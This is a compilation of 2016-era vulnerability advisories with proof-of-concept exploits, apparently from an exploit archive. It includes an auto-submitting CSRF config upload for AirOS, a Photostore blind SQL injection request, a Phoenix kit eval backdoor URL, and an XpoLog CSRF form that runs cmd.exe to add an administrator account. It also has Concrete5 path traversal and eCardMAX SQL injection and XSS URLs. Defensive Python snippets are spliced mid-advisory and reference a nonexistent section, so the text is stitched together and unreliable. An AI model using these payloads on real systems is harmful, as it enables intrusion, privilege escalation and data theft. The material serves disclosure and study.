          "httpd.port=80\n" + 
          "httpd.https.status=enabled\n" + 
          "httpd.https.port=443\n" + 
          "gui.wlan.advanced.status=disabled\n" + 
          "gui.network.advanced.status=enabled\n" + 
          "ebtables.sys.vlan.status=disabled\n" + 
          "ebtables.sys.status=enabled\n" + 
          "ebtables.sys.eap.status=disabled\n" + 
          "ebtables.sys.eap.1.status=enabled\n" + 
          "ebtables.sys.eap.1.devname=ath0\n" + 
          "ebtables.sys.arpnat.status=disabled\n" + 
          "ebtables.sys.arpnat.1.status=enabled\n" + 
          "ebtables.sys.arpnat.1.devname=ath0\n" + 
          "ebtables.status=enabled\n" + 
          "dyndns.status=disabled\n" + 
          "dnsmasq.status=disabled\n" + 
          "dnsmasq.1.status=disabled\n" + 
          "dnsmasq.1.devname=eth0\n" + 
          "discovery.status=enabled\n" + 
          "discovery.cdp.status=enabled\n" + 
          "dhcpd.1.start=192.168.1.2\n" + 
          "dhcpd.1.netmask=255.255.255.0\n" + 
          "dhcpd.1.lease_time=600\n" + 
          "dhcpd.1.end=192.168.1.254\n" + 
          "dhcpd.1.dnsproxy=enabled\n" + 
          "dhcpd.1.devname=br0\n" + 
          "dhcpd.1.dns.2.status=disabled\n" + 
          "dhcpd.1.dns.2.server=\n" + 
          "dhcpd.1.dns.1.status=disabled\n" + 
          "dhcpd.1.dns.1.server=\n" + 
          "dhcpd.1.status=enabled\n" + 
          "dhcpd.status=enabled\n" + 
          "dhcpc.1.status=enabled\n" + 
          "dhcpc.1.fallback_netmask=255.255.255.0\n" + 
          "dhcpc.1.fallback=192.168.10.1\n" + 
          "dhcpc.1.devname=eth0\n" + 
          "dhcpc.status=enabled\n" + 
          "bridge.1.fd=1\n" + 
          "bridge.1.comment=\n" + 
          "bridge.1.port.2.devname=eth1\n" + 
          "bridge.1.port.2.status=enabled\n" + 
          "bridge.1.port.1.devname=ath0\n" + 
          "bridge.1.port.1.status=enabled\n" + 
          "bridge.1.stp.status=disabled\n" + 
          "bridge.1.devname=br0\n" + 
          "bridge.1.status=enabled\n" + 
          "bridge.status=enabled\n" + 
          "aaa.status=disabled\n" + 
          "aaa.1.status=disabled\n" + 
          "aaa.1.radius.macacl.status=disabled\n" + 
          "aaa.1.radius.auth.1.status=disabled\n" + 
          "\r\n" + 
          "-----------------------------761818923593135447208368355\r\n" + 
          "Content-Disposition: form-data; name=\"cfgupload\"\r\n" + 
          "\r\n" + 
          "Upload\r\n" + 
          "-----------------------------761818923593135447208368355\r\n" + 
          "Content-Disposition: form-data; name=\"action\"\r\n" + 
          "\r\n" + 
          "cfgupload\r\n" + 
          "-----------------------------761818923593135447208368355\r\n" + 
          "Content-Disposition: form-data; name=\"systemdate\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------761818923593135447208368355--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest();
      document.getElementById("airos-exploit-apply").submit();
    </script>
  </body>
</html>

<!--
The contents of this advisory are copyright(c) 2016
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
-->
            
-------------------------------------------------------------------------------
Concrete5 <= 5.7.3.1 (Application::dispatch) Local File Inclusion Vulnerability
-------------------------------------------------------------------------------


[-] Software Link:

https://www.concrete5.org/


[-] Affected Versions:

Version 5.7.3.1 and probably other versions.


[-] Vulnerability Description:

The vulnerable code is located within the "Application::dispatch()" method:

public function dispatch(Request $request)
{
    if ($this->installed) {
        $response = $this->getEarlyDispatchResponse();
    }
    if (!isset($response)) {
        $collection = Route::getList();
        $context = new \Symfony\Component\Routing\RequestContext();
        $context->fromRequest($request);
        $matcher = new UrlMatcher($collection, $context);
        $path = rtrim($request->getPathInfo(), '/') . '/';
        try {
            $request->attributes->add($matcher->match($path));
            $matched = $matcher->match($path);
            $route = $collection->get($matched['_route']);
            Route::setRequest($request);
            $response = Route::execute($route, $matched);

The vulnerability exists because the path for the incoming request is retrieved using the
"Request::getPathInfo()" method from the Symfony framework, which allows the request path to
be supplied in certain HTTP headers (such as "X-Original-URL", among others). As a result, it is
possible to specify paths containing "dot-dot-slash" sequences without the URL encoding and
path normalization performed by the web server getting in the way. This could be exploited by
unauthenticated attackers to include arbitrary .php files located outside the Concrete5 root
directory, or from the Concrete5 codebase itself (potentially leading to unauthorized access to
certain functionalities), by sending an HTTP request like this:

GET /concrete5/index.php HTTP/1.1
Host: localhost
X-Original-Url: /tools/../../index
Connection: keep-alive

The dispatching process for this request will try to re-include the index.php file,
and this will end up with an unexpected error.
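The point of the header trick is that the application ends up trusting a path the web server
never normalized. The following is an added example, not Concrete5 or Symfony code, of the two
checks a router can apply on its own: honour path-override headers only behind a trusted proxy,
and refuse any candidate path that still carries a ".." segment after percent-decoding instead
of normalizing it away, then confirm the resulting file stays under the site root. The header
list, function names and the site root are assumptions made for the example; the request shown
above is reused as one of the inputs.

```python
import posixpath
from urllib.parse import unquote

# Headers that, per the advisory, can override the request path when the
# framework's Request object reads them.  A reverse proxy may set one of them
# legitimately; a browser-originated request never should.  (Assumed list.)
PATH_OVERRIDE_HEADERS = ("X-Original-URL", "X-Rewrite-URL")


def resolve_route_path(url_path, headers, trusted_proxy=False):
    """Return the path the router may dispatch, or None if it must be refused.

    - Override headers are honoured only when the request came via a trusted
      proxy; from anyone else their mere presence is refused.
    - The candidate is percent-decoded here because an override header
      bypasses the web server's own decoding and normalization.
    - A ".." segment is refused outright rather than collapsed: normalizing
      "/tools/../../index" to "/index" would hide the attempt.
    """
    lowered = {k.lower(): v for k, v in headers.items()}
    candidate = url_path
    for name in PATH_OVERRIDE_HEADERS:
        value = lowered.get(name.lower())
        if value is not None:
            if not trusted_proxy:
                return None
            candidate = value
            break
    decoded = unquote(candidate)
    if not decoded.startswith("/"):
        return None
    if any(seg == ".." for seg in decoded.split("/")):
        return None
    return posixpath.normpath(decoded)


def route_to_file(site_root, route_path):
    """Map an accepted route onto the filesystem and confirm containment."""
    root = site_root.rstrip("/")
    target = posixpath.normpath(posixpath.join(root, route_path.lstrip("/")))
    if target == root or target.startswith(root + "/"):
        return target
    return None


if __name__ == "__main__":
    # The request quoted in the advisory: plain URL, path supplied via header.
    print(resolve_route_path("/concrete5/index.php", {"X-Original-Url": "/tools/../../index"}))
```

With `trusted_proxy=False` (the default for a request arriving straight from a client) the
override header alone is enough to refuse the request, which is the behaviour a front-end
that is not deliberately rewriting paths should want.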


[-] Solution:

Update to a fixed version.


[-] Disclosure Timeline:

[05/05/2015] - Vulnerability details sent through HackerOne
[02/10/2015] - CVE number requested
[19/12/2015] - Vulnerability fixed on the GitHub repository
[26/06/2016] - Vulnerability publicly disclosed on HackerOne
[28/06/2016] - Publication of this advisory


[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has not assigned a CVE identifier for this vulnerability.


[-] Credits:

Vulnerability discovered by Egidio Romano.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2016-10


[-] Other References:

https://hackerone.com/reports/59665
            
Title       : Ktools Photostore <= 4.7.5 (Pre-Authentication) Blind SQL Injection
CVE-ID      : CVE-2016-4337
Google Dork: inurl:mgr.login.php
Product     : Photostore
Affected    : Versions prior to 4.7.5
Impact      : Critical
Remote      : Yes
Website link: http://www.ktools.net
Reported    : 02/06/2016
Authors     : Gal Goldshtein and Viktor Minin
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
No authentication (login) is required to exploit this vulnerability.
The Photostore application's password recovery module is prone to a blind SQL injection attack.
An attacker can exploit this vulnerability to retrieve all the data stored in the application's database.


Vulnerable code is located in the mgr.login.php file:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
case 'recover_login': {
    // $_POST['email'] is concatenated straight into the query without escaping or binding
    $result = mysqli_query( $db, 'SELECT username,password,email,admin_id FROM ' . $dbinfo['pre'] . 'admins where email = \'' . $_POST['email'] . '\'' );
    $returned_rows = mysqli_num_rows( $result );
    $db_admin_user = mysqli_fetch_array( $result );
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

PoC:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
POST /photostore/manager/mgr.login.php?pmode=recover_login HTTP/1.1
Host: victim.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://server/photostore/manager/mgr.login.php?username=demo&password=demo
Cookie: member[umem_id]=58C05864CA6A59DBGHJSKDHGDGS770D5; PHPSESSID=30afayreighgfdgucb0d2b0c6dece3158
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 9

email=%27%20[SQL PAYLOAD];#
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
            
# Exploit Title: Phoenix Exploit Kit - Remote Code Execution
# Exploit Author: CrashBandicot @DosPerl
# Date: 2016-06-30
# Tested on: MSWin32
 
# Vuln file : geoip.php (line 492)
 
isset($_GET['bdr']) ? eval($_GET['bdr']) : explode('nop','nop nop nop');
 
# PoC : http://localhost/Phoenix/includes/geoip.php?bdr=phpinfo();

# Screen : http://i.imgur.com/E7RBBRk.png
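The construct in geoip.php is a backdoor pattern, eval() applied directly to request input, and it
is worth having a scanner that flags it in any PHP tree an incident responder is handed. The
following is an added example, not part of the advisory, of such a check: a regular expression
that matches eval() whose argument is a request superglobal, directly or wrapped in one of the
usual decoding functions, run over a constructed set of PHP lines. The sample files and the
function name are assumptions made for the example.

```python
import re

# Constructed PHP lines standing in for a source-tree scan.  The geoip.php
# line mirrors the one quoted in the advisory; config.php hides the same idea
# behind base64_decode; util.php is benign.
SAMPLE_PHP = {
    "includes/geoip.php": [
        "<?php",
        "isset($_GET['bdr']) ? eval($_GET['bdr']) : explode('nop','nop nop nop');",
        "$country = lookup_country($_SERVER['REMOTE_ADDR']);",
    ],
    "includes/config.php": [
        "<?php",
        "$cfg = array('db' => 'localhost');",
        "eval(base64_decode($_POST['x']));",
    ],
    "includes/util.php": [
        "<?php",
        "function tidy($s) { return trim($s); }",
    ],
}

SUPERGLOBAL = r"\$_(GET|POST|REQUEST|COOKIE|SERVER)\b"

# eval( ... ) whose argument is request-controlled data, either directly or
# through any nesting of common decoding/inflating wrappers.
EVAL_ON_INPUT = re.compile(
    r"\beval\s*\(\s*"
    r"(?:(?:base64_decode|gzinflate|gzuncompress|str_rot13|urldecode)\s*\(\s*)*"
    + SUPERGLOBAL
)


def scan_php_source(files):
    """Return [(path, line_no, line)] for every line that evals request input."""
    hits = []
    for path, lines in files.items():
        for number, line in enumerate(lines, 1):
            if EVAL_ON_INPUT.search(line):
                hits.append((path, number, line.strip()))
    return hits


if __name__ == "__main__":
    for path, number, line in scan_php_source(SAMPLE_PHP):
        print("%s:%d: %s" % (path, number, line))
```

A superglobal that merely appears elsewhere on the line (the `$_SERVER['REMOTE_ADDR']` lookup in
the sample) is not reported; only the argument position of eval() counts, which keeps the
output short enough to read by hand.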

__END__
            

XpoLog Center V6 CSRF Remote Command Execution


Vendor: XpoLog LTD
Product web page: http://www.xpolog.com
Affected version: 6.4469
                  6.4254
                  6.4252
                  6.4250
                  6.4237
                  6.4235
                  5.4018

Summary: Applications Log Analysis and Management Platform.

Desc: XpoLog suffers from arbitrary command execution. Attackers
can exploit this issue using the task tool feature by adding a task
that runs a chosen binary with attacker-supplied arguments.
In combination with the CSRF weakness, an attacker can execute system
commands with SYSTEM privileges.
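Both this advisory and the Ubiquiti one in section 3 above come down to the same missing
control: a state-changing request is authorized by the session cookie alone, which a page on
another origin can get the browser to send. The XpoLog form even carries a csrfToken field set
to "NoToken", so the application has the parameter but does not verify it. The following is an
added example, not code from either vendor, of a per-session anti-CSRF token: an HMAC over the
session id and a fresh nonce, verified in constant time, and required on every state-changing
request in addition to the cookie. The server key, session ids and request shape are assumptions
made for the example.

```python
import hashlib
import hmac
import secrets

# Server-side secret (constructed for this example; a real deployment would
# generate it at first boot and keep it out of any exportable configuration).
SERVER_KEY = secrets.token_bytes(32)


def issue_csrf_token(session_id, key=SERVER_KEY):
    """Per-session token: random nonce plus an HMAC binding it to the session.

    The nonce makes the token unguessable; the HMAC ties it to one session so
    a token minted for another session (or a made-up one) will not verify.
    Nothing beyond the key has to be stored server-side.
    """
    nonce = secrets.token_hex(16)
    mac = hmac.new(key, (session_id + ":" + nonce).encode(), hashlib.sha256).hexdigest()
    return nonce + "." + mac


def verify_csrf_token(session_id, token, key=SERVER_KEY):
    """True only for a well-formed token whose MAC matches this session."""
    if not token or "." not in token:
        return False
    nonce, _, mac = token.partition(".")
    expected = hmac.new(key, (session_id + ":" + nonce).encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, mac)


def authorize_state_change(request, key=SERVER_KEY):
    """Gate for a state-changing request (config upload, task definition, apply).

    `request` is a constructed dict standing in for the parsed HTTP request:
    {"method": ..., "cookies": {...}, "form": {...}}.  The session cookie is
    what both advisories show the products relying on; the token is the extra
    factor a cross-origin page cannot read or forge.
    """
    if request["method"] not in ("POST", "PUT", "DELETE"):
        return False
    session_id = request["cookies"].get("SESSIONID")
    if not session_id:
        return False
    return verify_csrf_token(session_id, request["form"].get("csrf_token"), key)


if __name__ == "__main__":
    token = issue_csrf_token("sess-a")
    print(authorize_state_change({"method": "POST",
                                  "cookies": {"SESSIONID": "sess-a"},
                                  "form": {"csrf_token": token}}))
```

Because the token is embedded in the administrator's own pages and never in a cookie, a forged
request built on another origin arrives with the cookie but without a valid token and is
refused; a placeholder such as "NoToken" fails the same check.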

Tested on: Apache-Coyote/1.1
           Microsoft Windows Server 2012
           Microsoft Windows 7 Professional SP1 EN 64bit
           Java/1.7.0_45
           Java/1.8.0.91


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5335
Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2016-5335.php


14.06.2016

--


exePath = "C:\\windows\\system32\\cmd.exe"
exeArgs = "/C net user EVIL pass123 /add & net localgroup Administrators EVIL /add"

<html>
  <body>
    <form action="http://10.0.0.17:30303/logeye/tasks/xpotaskDefinitionAction.jsp?" method="POST">
      <input type="hidden" name="" value="" />
      <input type="hidden" name="csrfToken" value="NoToken" />
      <input type="hidden" name="taskId" value="1465930398522" />
      <input type="hidden" name="taskType" value="exe" />
      <input type="hidden" name="name" value="CCMMDD" />
      <input type="hidden" name="description" value="ZSL" />
      <input type="hidden" name="IsSsh" value="false" />
      <input type="hidden" name="exePath" value=""c&#58;&#92;&#92;windows&#92;&#92;system32&#92;&#92;cmd&#46;exe"" />
      <input type="hidden" name="exeArgs" value=""&#47;C&#32;net&#32;user&#32;EVIL&#32;pass123&#32;&#47;add&#32;&&#32;net&#32;localgroup&#32;Administrators&#32;EVIL&#32;&#47;add"" />
      <input type="hidden" name="exeEnvVar" value="" />
      <input type="hidden" name="exeWorkDir" value="" />
      <input type="hidden" name="exeOutputTargetFile" value="" />
      <input type="hidden" name="NameXpoTaskSched" value="taskId&#95;1465930366962" />
      <input type="hidden" name="IdXpoTaskSched" value="taskId&#95;1465930366962" />
      <input type="hidden" name="actionIdXpoTaskSched" value="0" />
      <input type="hidden" name="StateXpoTaskSched" value="1" />
      <input type="hidden" name="schedulerSuffix" value="XpoTaskSched" />
      <input type="hidden" name="trigTypeXpoTaskSched" value="cron" />
      <input type="hidden" name="minutesXpoTaskSched" value="0" />
      <input type="hidden" name="minutesEndXpoTaskSched" value="0" />
      <input type="hidden" name="numOfExecutionsXpoTaskSched" value="0" />
      <input type="hidden" name="frequencyXpoTaskSched" value="daily" />
      <input type="hidden" name="DayInMonthXpoTaskSched" value="all" />
      <input type="hidden" name="dailyTypeXpoTaskSched" value="repeat" />
      <input type="hidden" name="dailyRepeatValueXpoTaskSched" value="1" />
      <input type="hidden" name="dailyRepeatTypeXpoTaskSched" value="second" />
      <input type="hidden" name="hoursXpoTaskSched" value="0" />
      <input type="hidden" name="hoursEndXpoTaskSched" value="0" />
      <input type="hidden" name="hoursOnce0XpoTaskSched" value="&#45;1" />
      <input type="hidden" name="minutesOnce0XpoTaskSched" value="&#45;1" />
      <input type="hidden" name="secondsOnce0XpoTaskSched" value="&#45;1" />
      <input type="hidden" name="jobPriority" value="&#45;1" />
      <input type="hidden" name="ajaxTimestamp" value="1465930905166" />
      <input type="submit" value="Submit" />
    </form>
  </body>
</html>

--

exePath = "C:\\windows\\system32\\cmd.exe"
exeArgs = "/C whoami > c:\\Progra~1\\XpoLogCenter6\\defaultroot\\logeye\\testingus.txt"


GET
http://10.0.0.17:30303/logeye/testingus.txt

Response:

nt authority\system
            
Advisory ID: ZSL-2016-5336
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5336.php

eCardMAX 10.5 SQL Injection and XSS Vulnerabilities


[Software]

- eCardMAX 10.5


[Vendor]

- eCardMAX.COM - http://www.ecardmax.com/


[Vendor Product Description]

- eCardMax is the most trusted, powerful and dynamic online ecard software solution. It enables you to create your 
own ecard website with many of the advanced features found on other major sites. Starting your own ecard website 
with eCardMax is fast and easy.


[Advisory Timeline]

- 13/06/2016 -> Vulnerability discovered;
- 13/06/2016 -> First contact with vendor;
- 13/06/2016 -> Vendor responds asking for details;
- 14/06/2016 -> Vulnerability details sent to the vendor;
- 17/06/2016 -> Vendor working on a patch;
- 28/06/2016 -> Vendor Releases Patch
- 01/07/2016 -> Public Security Advisory Published


[Bug Summary]

- SQL Injection

- Cross Site Scripting (Reflected)


[Impact]

- High


[Affected Version]

- v10.5


[Tested on]

- Apache/2.2.26
- PHP/5.3.28
- MySQL/5.5.49-cll


[Bug Description and Proof of Concept]

- eCardMAX suffers from a SQL Injection vulnerability. Input passed via the 'row_number' GET parameter is not properly 
sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting 
arbitrary SQL code.

- Multiple cross-site scripting vulnerabilities were also discovered. The issue is triggered when input passed via multiple parameters 
is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's 
browser session in the context of an affected site.
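The Photostore recover_login code quoted earlier and the eCardMAX row_number and keyword parameters
share one root cause: request input is spliced into a query or a page as text. The following is an
added example, not code from either product, that places the concatenated query beside its bound
form and shows the reflected search term being output-encoded. It uses an in-memory SQLite table
as a stand-in for the admins table; the table contents, function names and the search-box markup
are assumptions made for the example.

```python
import html
import sqlite3


def make_demo_db():
    """In-memory stand-in for the admins table the recovery query reads (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admins (admin_id INTEGER, username TEXT, password TEXT, email TEXT)")
    conn.executemany("INSERT INTO admins VALUES (?, ?, ?, ?)", [
        (1, "admin", "hash-a", "admin@example.test"),
        (2, "editor", "hash-b", "editor@example.test"),
    ])
    conn.commit()
    return conn


def recover_login_unsafe(conn, email):
    """Same shape as the quoted mgr.login.php code: the value becomes part of the SQL text."""
    sql = "SELECT username,password,email,admin_id FROM admins WHERE email = '" + email + "'"
    return conn.execute(sql).fetchall()


def recover_login_safe(conn, email):
    """Placeholder binding: the driver sends the value apart from the query text,
    so it can only ever be compared as a string, never parsed as SQL.
    A table prefix like $dbinfo['pre'] cannot be bound; it must come from trusted
    configuration, never from the request."""
    sql = "SELECT username,password,email,admin_id FROM admins WHERE email = ?"
    return conn.execute(sql, (email,)).fetchall()


def render_search_keyword(keyword):
    """Reflect a search term into an attribute with <, >, &, ' and " encoded,
    so a term cannot close the attribute or the tag it sits in."""
    return '<input name="keyword" value="%s">' % html.escape(keyword, quote=True)


if __name__ == "__main__":
    db = make_demo_db()
    print(recover_login_safe(db, "admin@example.test"))
    print(render_search_keyword('"><script>alert(1)</script>'))
```

The safe lookup returns nothing for a term that is not literally an address in the table, and
the rendered search box carries the term as inert text; those two behaviours are what the
advisories' PoC URLs are checking for the absence of.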


[Proof-of-Concept]

1. SQL Injection:

Parameter: row_number (GET)
POC URL:
http://localhost/ecardmaxdemo/admin/index.php?step=admin_show_keyword&what=&row_number=10%20order%20by%201--&search_year=2016&page=2

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

2. Cross Site Scripting (Reflected):

http://localhost/ecardmaxdemo/admin/index.php?step=admin_member_display&search_field=all&keyword=%3Cscript%3Ealert(1)%3C%2Fscript%3E&cmd_button=Search+User
Parameter(s): keyword (GET)

http://localhost/ecardmaxdemo/admin/index.php?step=admin_cellphone_carrier&row_number=15&page=14%22%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
Parameter(s): page (GET)

http://localhost/ecardmaxdemo/admin/index.php?step=admin_show_keyword&what=&row_number=10%22%3E%3Cscript%3Ealert(1)%3C/script%3E&search_year=2016&page=2
Parameter(s): row_number (GET)

http://localhost/ecardmaxdemo/admin/index.php?step=admin_member_display_inactive_account&what=&row_number=15&what2=&cmd_button=%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E&list_item=%3C/script%3E%3Cscript%3Ealert(2)%3C/script%3E&search_field=%3C/script%3E%3Cscript%3Ealert(3)%3C/script%3E&keyword=&num_day=%3C/script%3E%3Cscript%3Ealert(4)%3C/script%3E&num_what=%3C/script%3E%3Cscript%3Ealert(5)%3C/script%3E&from_month=%3C/script%3E%3Cscript%3Ealert(6)%3C/script%3E&from_day=%3C/script%3E%3Cscript%3Ealert(7)%3C/script%3E&from_year=%3C/script%3E%3Cscript%3Ealert(8)%3C/script%3E&to_day=%3C/script%3E%3Cscript%3Ealert(9)%3C/script%3E&to_month=%3C/script%3E%3Cscript%3Ealert(10)%3C/script%3E&to_year=%3C/script%3E%3Cscript%3Ealert(11)%3C/script%3E&page=2%3C/script%3E%3Cscript%3Ealert(12)%3C/script%3E
Parameter(s): cmd_button, list_item, search_field, num_day, num_what, from_month, from_day, from_year, to_day, to_month, to_year, page  (GET)

http://localhost/ecardmaxdemo/admin/index.php?step=admin_member_display&search_field=user_name_id&cmd_button=Search+User&keyword=833981213299707%22%3E%3Cscript%3Ealert(1)%3C/script%3E
Parameter(s): keyword (GET)

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

All flaws described here were discovered and researched by:

Bikramaditya Guha aka "PhoenixX"